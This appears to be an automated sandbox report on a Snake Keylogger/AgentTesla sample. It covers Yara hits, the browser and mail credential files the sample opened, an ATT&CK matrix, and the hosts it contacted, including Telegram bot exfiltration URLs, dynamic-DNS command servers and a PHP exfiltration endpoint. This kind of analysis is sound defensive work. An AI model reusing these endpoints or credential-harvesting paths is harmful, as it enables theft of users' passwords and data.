Stealing of Sensitive Information

Yara detected Snake Keylogger

Source: Yara match	File source: 0000000F.00000002.4591231709.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.4590760130.0000000002841000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 0.2.SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe.39e9b90.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe.3a2cdb0.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe.3a2cdb0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe.39e9b90.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2149465805.0000000003951000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe PID: 1444, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe PID: 3220, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: xRAvleeiuDbJ.exe PID: 2488, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match	File source: 9.2.SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe.39e9b90.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe.3a2cdb0.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe.3a2cdb0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe.39e9b90.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.4587075709.0000000000427000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2149465805.0000000003951000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe PID: 1444, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe PID: 3220, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Source: Yara match	File source: 0.2.SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe.39e9b90.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe.3a2cdb0.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe.3a2cdb0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe.39e9b90.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2149465805.0000000003951000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe PID: 1444, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe PID: 3220, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: xRAvleeiuDbJ.exe PID: 2488, type: MEMORYSTR

Remote Access Functionality

Yara detected Snake Keylogger

Source: Yara match	File source: 0000000F.00000002.4591231709.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.4590760130.0000000002841000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 0.2.SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe.39e9b90.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe.3a2cdb0.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe.3a2cdb0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe.39e9b90.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2149465805.0000000003951000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe PID: 1444, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe PID: 3220, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: xRAvleeiuDbJ.exe PID: 2488, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match	File source: 9.2.SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe.39e9b90.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe.3a2cdb0.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe.3a2cdb0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe.39e9b90.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.4587075709.0000000000427000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2149465805.0000000003951000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe PID: 1444, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe PID: 3220, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Scheduled Task/Job	1 DLL Side-Loading	1 DLL Side-Loading	11 Disable or Modify Tools	1 OS Credential Dumping	1 File and Directory Discovery	Remote Services	11 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 Scheduled Task/Job	111 Process Injection	1 Deobfuscate/Decode Files or Information	LSASS Memory	13 System Information Discovery	Remote Desktop Protocol	1 Data from Local System	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 Scheduled Task/Job	3 Obfuscated Files or Information	Security Account Manager	1 Query Registry	SMB/Windows Admin Shares	1 Email Collection	11 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	12 Software Packing	NTDS	11 Security Software Discovery	Distributed Component Object Model	Input Capture	1 Non-Standard Port	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	1 Process Discovery	SSH	Keylogging	3 Non-Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Masquerading	Cached Domain Credentials	31 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	24 Application Layer Protocol	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	31 Virtualization/Sandbox Evasion	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	111 Process Injection	Proc Filesystem	1 System Network Configuration Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	74%	ReversingLabs	Win32.Spyware.Snakekeylogger
SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	100%	Avira	TR/AD.SnakeStealer.udtvt
SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	100%	Avira	TR/AD.SnakeStealer.udtvt
C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	74%	ReversingLabs	Win32.Spyware.Snakekeylogger

Source	Detection	Scanner	Label
https://duckduckgo.com/chrome_newtab	0%	URL Reputation	safe
https://duckduckgo.com/ac/?q=	0%	URL Reputation	safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	URL Reputation	safe
http://checkip.dyndns.org	0%	URL Reputation	safe
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	0%	URL Reputation	safe
https://www.ecosia.org/newtab/	0%	URL Reputation	safe
https://ac.ecosia.org/autocomplete?q=	0%	URL Reputation	safe
http://checkip.dyndns.org/	0%	URL Reputation	safe
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	0%	URL Reputation	safe
http://checkip.dyndns.org/q	0%	URL Reputation	safe
https://reallyfreegeoip.org	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	0%	URL Reputation	safe
https://reallyfreegeoip.org/xml/	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
us2.smtp.mailhostbox.com	208.91.199.223	true	false	unknown
reallyfreegeoip.org	188.114.96.3	true	true	unknown
api.telegram.org	149.154.167.220	true	true	unknown
checkip.dyndns.com	132.226.247.73	true	false	unknown
checkip.dyndns.org	unknown	unknown	true	unknown
smtp.inhousepick.com	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://reallyfreegeoip.org/xml/173.254.250.76	false		unknown
http://checkip.dyndns.org/	false	URL Reputation: safe	unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:066656%0D%0ADate%20and%20Time:%2023/10/2024%20/%2002:42:19%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20066656%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D	false		unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:066656%0D%0ADate%20and%20Time:%2023/10/2024%20/%2002:32:29%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20066656%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D	false		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://reallyfreegeoip.org/xml/173.254.250.76$	SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe, 00000009.00000002.4590760130.00000000028BA000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe, 00000009.00000002.4590760130.0000000002928000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe, 00000009.00000002.4590760130.00000000028FF000.00000004.00000800.00020000.00000000.sdmp, xRAvleeiuDbJ.exe, 0000000F.00000002.4591231709.0000000002DC6000.00000004.00000800.00020000.00000000.sdmp, xRAvleeiuDbJ.exe, 0000000F.00000002.4591231709.0000000002D59000.00000004.00000800.00020000.00000000.sdmp, xRAvleeiuDbJ.exe, 0000000F.00000002.4591231709.0000000002D9F000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://www.office.com/	xRAvleeiuDbJ.exe, 0000000F.00000002.4591231709.0000000002EA7000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://duckduckgo.com/chrome_newtab	SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe, 00000009.00000002.4594713684.0000000003B4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe, 00000009.00000002.4594713684.0000000003861000.00000004.00000800.00020000.00000000.sdmp, xRAvleeiuDbJ.exe, 0000000F.00000002.4595456900.0000000003FEE000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://duckduckgo.com/ac/?q=	SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe, 00000009.00000002.4594713684.0000000003B4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe, 00000009.00000002.4594713684.0000000003861000.00000004.00000800.00020000.00000000.sdmp, xRAvleeiuDbJ.exe, 0000000F.00000002.4595456900.0000000003FEE000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.telegram.org	SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe, 00000009.00000002.4590760130.0000000002928000.00000004.00000800.00020000.00000000.sdmp, xRAvleeiuDbJ.exe, 0000000F.00000002.4591231709.0000000002DC6000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe, 00000009.00000002.4594713684.0000000003B4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe, 00000009.00000002.4594713684.0000000003861000.00000004.00000800.00020000.00000000.sdmp, xRAvleeiuDbJ.exe, 0000000F.00000002.4595456900.0000000003FEE000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://api.telegram.org/bot	SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe, 00000000.00000002.2149465805.0000000003951000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe, 00000009.00000002.4587075709.0000000000427000.00000040.00000400.00020000.00000000.sdmp, SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe, 00000009.00000002.4590760130.0000000002928000.00000004.00000800.00020000.00000000.sdmp, xRAvleeiuDbJ.exe, 0000000F.00000002.4591231709.0000000002DC6000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://us2.smtp.mailhostbox.com	SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe, 00000009.00000002.4590760130.0000000002A33000.00000004.00000800.00020000.00000000.sdmp, xRAvleeiuDbJ.exe, 0000000F.00000002.4591231709.0000000002ED2000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://www.office.com/lB	SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe, 00000009.00000002.4590760130.0000000002A03000.00000004.00000800.00020000.00000000.sdmp, xRAvleeiuDbJ.exe, 0000000F.00000002.4591231709.0000000002EA2000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe, 00000009.00000002.4594713684.0000000003B4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe, 00000009.00000002.4594713684.0000000003861000.00000004.00000800.00020000.00000000.sdmp, xRAvleeiuDbJ.exe, 0000000F.00000002.4595456900.0000000003FEE000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://checkip.dyndns.org	SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe, 00000009.00000002.4590760130.0000000002841000.00000004.00000800.00020000.00000000.sdmp, xRAvleeiuDbJ.exe, 0000000F.00000002.4591231709.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe, 00000009.00000002.4594713684.0000000003B4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe, 00000009.00000002.4594713684.0000000003861000.00000004.00000800.00020000.00000000.sdmp, xRAvleeiuDbJ.exe, 0000000F.00000002.4595456900.0000000003FEE000.00000004.00000800.00020000.00000000.sdmp, xRAvleeiuDbJ.exe, 0000000F.00000002.4595456900.0000000003D03000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=	SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe, 00000009.00000002.4590760130.0000000002928000.00000004.00000800.00020000.00000000.sdmp, xRAvleeiuDbJ.exe, 0000000F.00000002.4591231709.0000000002DC6000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://chrome.google.com/webstore?hl=en	xRAvleeiuDbJ.exe, 0000000F.00000002.4591231709.0000000002E67000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://www.ecosia.org/newtab/	SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe, 00000009.00000002.4594713684.0000000003B4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe, 00000009.00000002.4594713684.0000000003861000.00000004.00000800.00020000.00000000.sdmp, xRAvleeiuDbJ.exe, 0000000F.00000002.4595456900.0000000003FEE000.00000004.00000800.00020000.00000000.sdmp, xRAvleeiuDbJ.exe, 0000000F.00000002.4595456900.0000000003D03000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://varders.kozow.com:8081	SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe, 00000000.00000002.2149465805.0000000003951000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe, 00000009.00000002.4587075709.0000000000427000.00000040.00000400.00020000.00000000.sdmp, SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe, 00000009.00000002.4590760130.0000000002841000.00000004.00000800.00020000.00000000.sdmp, xRAvleeiuDbJ.exe, 0000000F.00000002.4591231709.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://aborters.duckdns.org:8081	SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe, 00000000.00000002.2149465805.0000000003951000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe, 00000009.00000002.4587075709.0000000000427000.00000040.00000400.00020000.00000000.sdmp, SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe, 00000009.00000002.4590760130.0000000002841000.00000004.00000800.00020000.00000000.sdmp, xRAvleeiuDbJ.exe, 0000000F.00000002.4591231709.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://ac.ecosia.org/autocomplete?q=	SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe, 00000009.00000002.4594713684.0000000003B4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe, 00000009.00000002.4594713684.0000000003861000.00000004.00000800.00020000.00000000.sdmp, xRAvleeiuDbJ.exe, 0000000F.00000002.4595456900.0000000003FEE000.00000004.00000800.00020000.00000000.sdmp, xRAvleeiuDbJ.exe, 0000000F.00000002.4595456900.0000000003D03000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://51.38.247.67:8081/_send_.php?L	SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe, 00000009.00000002.4590760130.0000000002A33000.00000004.00000800.00020000.00000000.sdmp, xRAvleeiuDbJ.exe, 0000000F.00000002.4591231709.0000000002ED2000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://anotherarmy.dns.army:8081	SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe, 00000000.00000002.2149465805.0000000003951000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe, 00000009.00000002.4587075709.0000000000427000.00000040.00000400.00020000.00000000.sdmp, SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe, 00000009.00000002.4590760130.0000000002841000.00000004.00000800.00020000.00000000.sdmp, xRAvleeiuDbJ.exe, 0000000F.00000002.4591231709.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://smtp.inhousepick.com	SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe, 00000009.00000002.4590760130.0000000002A33000.00000004.00000800.00020000.00000000.sdmp, xRAvleeiuDbJ.exe, 0000000F.00000002.4591231709.0000000002ED2000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:066656%0D%0ADate%20a	SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe, 00000009.00000002.4590760130.0000000002928000.00000004.00000800.00020000.00000000.sdmp, xRAvleeiuDbJ.exe, 0000000F.00000002.4591231709.0000000002DC6000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe, 00000009.00000002.4594713684.0000000003B4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe, 00000009.00000002.4594713684.0000000003861000.00000004.00000800.00020000.00000000.sdmp, xRAvleeiuDbJ.exe, 0000000F.00000002.4595456900.0000000003FEE000.00000004.00000800.00020000.00000000.sdmp, xRAvleeiuDbJ.exe, 0000000F.00000002.4595456900.0000000003D03000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://checkip.dyndns.org/q	SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe, 00000000.00000002.2149465805.0000000003951000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe, 00000009.00000002.4587075709.0000000000427000.00000040.00000400.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://chrome.google.com/webstore?hl=enlB	SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe, 00000009.00000002.4590760130.00000000029D2000.00000004.00000800.00020000.00000000.sdmp, xRAvleeiuDbJ.exe, 0000000F.00000002.4591231709.0000000002E71000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://reallyfreegeoip.org	SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe, 00000009.00000002.4590760130.0000000002890000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe, 00000009.00000002.4590760130.0000000002928000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe, 00000009.00000002.4590760130.00000000028FF000.00000004.00000800.00020000.00000000.sdmp, xRAvleeiuDbJ.exe, 0000000F.00000002.4591231709.0000000002DC6000.00000004.00000800.00020000.00000000.sdmp, xRAvleeiuDbJ.exe, 0000000F.00000002.4591231709.0000000002D2F000.00000004.00000800.00020000.00000000.sdmp, xRAvleeiuDbJ.exe, 0000000F.00000002.4591231709.0000000002D9F000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe, 00000000.00000002.2148454163.000000000299A000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe, 00000009.00000002.4590760130.0000000002841000.00000004.00000800.00020000.00000000.sdmp, xRAvleeiuDbJ.exe, 0000000B.00000002.2193945659.0000000002FFA000.00000004.00000800.00020000.00000000.sdmp, xRAvleeiuDbJ.exe, 0000000F.00000002.4591231709.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe, 00000009.00000002.4594713684.0000000003B4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe, 00000009.00000002.4594713684.0000000003861000.00000004.00000800.00020000.00000000.sdmp, xRAvleeiuDbJ.exe, 0000000F.00000002.4595456900.0000000003FEE000.00000004.00000800.00020000.00000000.sdmp, xRAvleeiuDbJ.exe, 0000000F.00000002.4595456900.0000000003D03000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded	SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe, 00000000.00000002.2149465805.0000000003951000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe, 00000009.00000002.4587075709.0000000000427000.00000040.00000400.00020000.00000000.sdmp	false		unknown
